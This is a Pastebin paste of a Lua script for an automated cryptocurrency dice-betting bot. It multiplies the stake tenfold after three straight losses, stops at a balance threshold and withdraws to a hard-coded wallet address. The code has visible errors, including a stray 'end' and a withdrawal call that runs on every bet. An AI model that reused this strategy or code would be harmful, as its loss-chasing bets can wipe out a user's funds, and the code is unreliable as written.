Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- lol = balance/10000
- chance = 49
- nextbet = lol
- cox = 4
- box = 0
- bit = 0
- good = 12
- shit = balance*1.1
- function dobet()
- if win then
- box = 0
- bit +=1
- else
- box +=1
- bit = 0
- end
- if (box == 3) then
- nextbet = previousbet*10
- box = 0
- end
- if (bit == 3) then
- nextbet = balance/10000
- bit = 0
- end
- if balance > shit and win then
- nextbet = balance/10000
- shit = balance*1.1
- end
- if balance > good then
- stop()
- end
- withdraw (cox,DFy5pT5xNkfPJC32DAddFW8H2c47usFfLB)
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement